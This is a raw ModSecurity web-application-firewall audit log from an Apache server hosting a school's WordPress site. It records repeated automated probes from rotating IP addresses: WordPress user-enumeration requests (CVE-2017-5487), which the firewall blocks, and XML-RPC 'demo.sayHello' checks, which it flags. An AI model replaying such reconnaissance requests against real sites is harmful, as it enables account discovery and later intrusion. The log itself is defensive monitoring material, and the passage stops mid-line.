ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746847432006623 4626 (- - -) Stopwatch2: 1746847432006623 4626; combined=3600, p1=425, p2=2978, p3=24, p4=27, p5=87, sr=67, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e039f969-Z-- --03e91567-A-- [10/May/2025:10:23:54 +0700] aB7GyhLuBiaF9R054QBbxAAAABM 103.236.140.4 54770 103.236.140.4 8181 --03e91567-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.122 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.122 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --03e91567-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --03e91567-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746847434967108 1941 (- - -) Stopwatch2: 1746847434967108 1941; combined=973, p1=340, p2=606, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --03e91567-Z-- --02af2417-A-- [10/May/2025:10:24:05 +0700] aB7G1auC4AqLGUOyzyX8AwAAAIE 103.236.140.4 54774 103.236.140.4 8181 --02af2417-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.122 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.122 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --02af2417-C-- demo.sayHello --02af2417-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --02af2417-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746847445005787 5682 (- - -) Stopwatch2: 1746847445005787 5682; combined=4159, p1=541, p2=3401, p3=32, p4=33, p5=91, sr=72, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02af2417-Z-- --274a7647-A-- [10/May/2025:10:29:54 +0700] aB7IMsi6w7GTj2w44Z6cZQAAAMo 103.236.140.4 54826 103.236.140.4 8181 --274a7647-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.181.48 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.181.48 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --274a7647-C-- demo.sayHello --274a7647-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --274a7647-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746847794931116 4725 (- - -) Stopwatch2: 1746847794931116 4725; combined=3653, p1=468, p2=2989, p3=22, p4=26, p5=87, sr=66, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --274a7647-Z-- --dc586b45-A-- [10/May/2025:10:50:37 +0700] aB7NDRLuBiaF9R054QBb1QAAAAU 103.236.140.4 54930 103.236.140.4 8181 --dc586b45-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.95.41 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.95.41 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --dc586b45-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc586b45-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746849037699772 2833 (- - -) Stopwatch2: 1746849037699772 2833; combined=1235, p1=438, p2=767, p3=0, p4=0, p5=30, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc586b45-Z-- --4a689d0e-A-- [10/May/2025:10:50:45 +0700] aB7NFauC4AqLGUOyzyX8FQAAAIc 103.236.140.4 54934 103.236.140.4 8181 --4a689d0e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.95.41 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.95.41 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4a689d0e-C-- demo.sayHello --4a689d0e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4a689d0e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746849045373291 5776 (- - -) Stopwatch2: 1746849045373291 5776; combined=4256, p1=541, p2=3519, p3=27, p4=28, p5=82, sr=79, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4a689d0e-Z-- --d5eb8e4f-A-- [10/May/2025:10:51:17 +0700] aB7NNauC4AqLGUOyzyX8FgAAAIk 103.236.140.4 54942 103.236.140.4 8181 --d5eb8e4f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.80 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d5eb8e4f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d5eb8e4f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746849077120090 3495 (- - -) Stopwatch2: 1746849077120090 3495; combined=1538, p1=558, p2=943, p3=0, p4=0, p5=37, sr=127, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d5eb8e4f-Z-- --160a2d7c-A-- [10/May/2025:10:51:21 +0700] aB7NORLuBiaF9R054QBb2QAAAAc 103.236.140.4 54946 103.236.140.4 8181 --160a2d7c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.80 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.80 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --160a2d7c-C-- demo.sayHello --160a2d7c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --160a2d7c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746849081452583 5142 (- - -) Stopwatch2: 1746849081452583 5142; combined=3938, p1=436, p2=3274, p3=36, p4=32, p5=93, sr=66, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --160a2d7c-Z-- --3ae8e927-A-- [10/May/2025:10:51:23 +0700] aB7NOxLuBiaF9R054QBb2gAAABA 103.236.140.4 54948 103.236.140.4 8181 --3ae8e927-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.94.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.94.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3ae8e927-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ae8e927-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746849083283995 3210 (- - -) Stopwatch2: 1746849083283995 3210; combined=1441, p1=511, p2=898, p3=0, p4=0, p5=32, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ae8e927-Z-- --6c49eb76-A-- [10/May/2025:10:51:30 +0700] aB7NQsi6w7GTj2w44Z6ccQAAAMU 103.236.140.4 54954 103.236.140.4 8181 --6c49eb76-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.94.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.94.59 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6c49eb76-C-- demo.sayHello --6c49eb76-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6c49eb76-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746849090470954 5801 (- - -) Stopwatch2: 1746849090470954 5801; combined=4195, p1=577, p2=3386, p3=32, p4=37, p5=99, sr=104, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6c49eb76-Z-- --eaf59932-A-- [10/May/2025:10:52:07 +0700] aB7NZxLuBiaF9R054QBb3QAAABE 103.236.140.4 54964 103.236.140.4 8181 --eaf59932-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.100.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.100.222 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --eaf59932-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eaf59932-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746849127461453 2811 (- - -) Stopwatch2: 1746849127461453 2811; combined=1266, p1=426, p2=810, p3=0, p4=0, p5=29, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eaf59932-Z-- --a8af4123-A-- [10/May/2025:10:52:15 +0700] aB7Nb8i6w7GTj2w44Z6ccgAAAMc 103.236.140.4 54968 103.236.140.4 8181 --a8af4123-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.100.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.100.222 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a8af4123-C-- demo.sayHello --a8af4123-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8af4123-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746849135178477 4778 (- - -) Stopwatch2: 1746849135178477 4778; combined=3651, p1=447, p2=3002, p3=25, p4=27, p5=88, sr=66, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8af4123-Z-- --faf46a51-A-- [10/May/2025:10:52:32 +0700] aB7NgMi6w7GTj2w44Z6ccwAAAMY 103.236.140.4 54972 103.236.140.4 8181 --faf46a51-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.35.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.35.49 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --faf46a51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --faf46a51-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746849152487269 3558 (- - -) Stopwatch2: 1746849152487269 3558; combined=1511, p1=485, p2=994, p3=0, p4=0, p5=32, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --faf46a51-Z-- --fc79c90d-A-- [10/May/2025:10:52:44 +0700] aB7NjBLuBiaF9R054QBb3wAAABM 103.236.140.4 54976 103.236.140.4 8181 --fc79c90d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.35.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.35.49 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fc79c90d-C-- demo.sayHello --fc79c90d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc79c90d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746849164174773 6400 (- - -) Stopwatch2: 1746849164174773 6400; combined=4621, p1=619, p2=3760, p3=39, p4=43, p5=96, sr=77, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc79c90d-Z-- --68d73053-A-- [10/May/2025:10:53:36 +0700] aB7NwBLuBiaF9R054QBb4AAAABQ 103.236.140.4 54980 103.236.140.4 8181 --68d73053-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.185.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.185.171 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --68d73053-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --68d73053-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746849216739304 3347 (- - -) Stopwatch2: 1746849216739304 3347; combined=1429, p1=486, p2=909, p3=0, p4=0, p5=34, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68d73053-Z-- --6e038120-A-- [10/May/2025:10:53:43 +0700] aB7NxxLuBiaF9R054QBb4QAAABU 103.236.140.4 54984 103.236.140.4 8181 --6e038120-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.185.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.185.171 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6e038120-C-- demo.sayHello --6e038120-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6e038120-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746849223766629 5020 (- - -) Stopwatch2: 1746849223766629 5020; combined=3728, p1=492, p2=3020, p3=27, p4=25, p5=95, sr=77, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6e038120-Z-- --e383dc4c-A-- [10/May/2025:10:53:50 +0700] aB7NzhLuBiaF9R054QBb4gAAABY 103.236.140.4 54988 103.236.140.4 8181 --e383dc4c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.195.182 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.195.182 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e383dc4c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e383dc4c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746849230573885 3493 (- - -) Stopwatch2: 1746849230573885 3493; combined=1544, p1=583, p2=931, p3=0, p4=0, p5=30, sr=179, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e383dc4c-Z-- --555aa615-A-- [10/May/2025:10:53:54 +0700] aB7N0quC4AqLGUOyzyX8IAAAAJU 103.236.140.4 54992 103.236.140.4 8181 --555aa615-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.195.182 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.195.182 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --555aa615-C-- demo.sayHello --555aa615-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --555aa615-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line 